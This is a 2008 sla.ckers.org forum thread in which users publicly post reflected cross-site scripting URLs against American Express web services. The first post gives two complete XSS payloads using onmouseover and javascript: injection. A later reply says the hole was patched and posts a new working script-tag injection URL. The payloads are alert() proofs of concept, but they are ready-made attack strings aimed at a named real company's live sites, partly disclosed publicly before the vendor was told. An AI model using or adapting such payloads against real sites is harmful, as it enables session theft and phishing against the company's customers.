Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
AmericanExpress XSSs
Posted by: C1c4Tr1Z
Date: August 04, 2008 09:37PM

Well, I think this is very (but very!) dangerous if you know how to use it.

https://www01.extra.americanexpress.com/Initial.aspx?target=javascript:alert(%22C1c4Tr1Z%22)%27/onmouseover=alert(%22C1c4Tr1Z%22);foo=%27

https://sso.americanexpress.com/SSO/request?request_type=un_createid&ssobrand=&ssolang=en_US&REALMOID=06-3dcadafa-92e6-0028-0000-151f0000151f&SSOURL=%22%0B+onmouseover=alert(/XSS/)+foo=%22&VALUE=abc (I love SSL)

I will contact the admins.

Quote

American Express takes your privacy very seriously.

---------------------------------------------------------------------------------
[[url=http://voodoo-labs.org]Voodoo Research Group[/url]]
[[url=http://foro.undersecurity.net/]US.net forum[/url]]

Options: ReplyQuote
Re: AmericanExpress XSSs
Posted by: Kyo
Date: August 05, 2008 12:12AM

ooooh, nice one.

Options: ReplyQuote
Re: AmericanExpress XSSs
Posted by: TheInsider
Date: December 24, 2008 07:52PM

Yes, quite nice!
However, they patched it, but it took me a moment to find a new one also in HTTPS :)

https://www01.extra.americanexpress.com/ProductImage.aspx?url=https://merpic.intelliwebservices.com/img/full/10185/b2/50fe31e266936b2887ab3ef9608f2db2.gif%22%3E%3Cscript%3Ealert(%27American%20XSSspress%27)%3C/script%3E%3Cdiv%20id=%22

http://rafelivgi.blogspot.com
Aspect9 Founder & Chief Security Architect
------------------------------------------
My job is to assess not assassinate
You can spend your life reading what others write or you can spend your life writing for others to read, choose your destiny!

Options: ReplyQuote
Re: AmericanExpress XSSs
Date: December 25, 2008 11:53PM

When will Amex learn =o(

Options: ReplyQuote


Sorry, only registered users may post in this forum.